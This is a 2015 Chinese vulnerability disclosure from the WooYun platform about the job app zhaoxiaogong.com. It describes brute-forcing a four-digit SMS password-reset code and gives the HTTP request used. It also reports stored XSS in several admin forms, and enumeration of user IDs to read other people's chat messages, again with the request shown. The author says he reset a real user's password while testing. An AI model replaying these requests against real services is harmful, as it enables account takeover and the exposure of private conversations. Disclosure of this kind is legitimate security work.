当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126849

漏洞标题:找小工多处存储型XSS漏洞、任意用户密码找回、越权访问他人信息(其他漏洞打包)

相关厂商:zhaoxiaogong.com

漏洞作者: Ton7BrEak

提交时间:2015-07-15 11:39

修复时间:2015-08-29 12:10

公开时间:2015-08-29 12:10

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

看到前面有位仁兄提交了一个xss漏洞都是16rank~我都惊呆了~要是拿了数据库 服务器~你们厂商又改怎么表示呀!
多漏洞打包,请多给rank~谢谢~

详细说明:

漏洞一 任意用户找回密码


001x 注册的时候发现验证码是4位数字,那么在找回密码的时候就存在被爆破的风险。
首先注册一个手机号,在app中设置修改密码,可以接收到一条4位数字验证码【再次发送的验证码短期内都是相同的,这里可以作为一个利用条件】

验证码重复.jpg


002x 抓包,设置captcha从0001~9999

GET /index.php?app=api_ios&mod=Pact&act=confirmCaptcha&uname=13197163339&version=1.0&captcha=1234HTTP/1.1
Host: www.gongren8.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; PE-UL00 Build/HuaweiPE-UL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
Accept-Encoding: gzip
CHANNEL: thinklife
CODE: android4.4.2_PE-UL00_zxg4.2.1(2734)


003x Response 主要有两个状态

{"status":1,"info":"\u6b64\u9a8c\u8bc1\u7801\u6b63\u786e"} //此验证码正确
{"status":3,"info":"\u6b64\u624b\u673a\u9a8c\u8bc1\u7801\u9519\u8bef"} //此手机验证码错误


004x 根据response的返回值,来获取正确的验证码

验证码.jpg


005x 由于短期的验证码是一样的,所以手机再次获取验证码直接填写刚刚爆破获取的验证码,轻轻松松改密码。这里就以官网演示的手机号重置密码。18938886293 密码修改为123456 (抱歉)

找回密码证明.jpg


漏洞二 多处存储型XSS


工人管理平台存在文本输入的地方都存在xss漏洞
001x 公司信息所有的可输入框
http://www.zhaoxiaogong.com/index.php?app=group&mod=Set&act=index

XSS1--公司信息.jpg


002x 客户管理,添加客户,客户信息的填写存在xss问题
http://www.zhaoxiaogong.com/index.php?app=group&mod=Set&act=customer

XSS2--客户管理.jpg


003x 公司配置,欢迎语这里存在xss问题
http://www.zhaoxiaogong.com/index.php?app=group&mod=Set&act=config

XSS3--公司配置.jpg


漏洞三 APP越权访问他人会话信息


鉴于app的设计需要,所以工人的信息是可以直接查看的,但是用户的会话信息是不能够被遍历查看的。对uid进行一次遍历~从返回长度知道有没有信息,而且也可以看到会话信息。

POST /index.php?app=api_ios&mod=Pact&act=message HTTP/1.1
Content-Length: 33
Content-Type: application/x-www-form-urlencoded
Host: www.gongren8.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; PE-UL00 Build/HuaweiPE-UL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
Accept-Encoding: gzip
CHANNEL: thinklife
CODE: android4.4.2_PE-UL00_zxg4.2.1(2734)
version=2.0&uid=23577&sequence=35


证明通过uid可以遍历会话信息,随意找了个最大长度的 发现有亮点啊~我也想当群众演员我也想去拍周韦彤

会话信息遍历.jpg


会话信息遍历随意一处信息.jpg

漏洞证明:

三个危害都是比较大的
1、重置已知号码的密码
2、存储型XSS可以做很多事情,盲打后台,脚本攻击等等(不要轻视XSS)
3、越权访问他人信息
还有一个app程序拒绝服务。操作流程如下
1、打开APP,修改密码操作,获取验证码
2、输入正确的验证码跳转到下一步
3、在输入新密码的界面点击返回
4、程序报错,程序停止运行

拒绝服务.jpg


ok·~到此结束

修复方案:

版权声明:转载请注明来源 Ton7BrEak@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-15 12:10

厂商回复:

对于评级,我们不专业。感谢各位。吊丝创业。以后在这方面的意识要加强。在逐步处理中。

最新状态:

暂无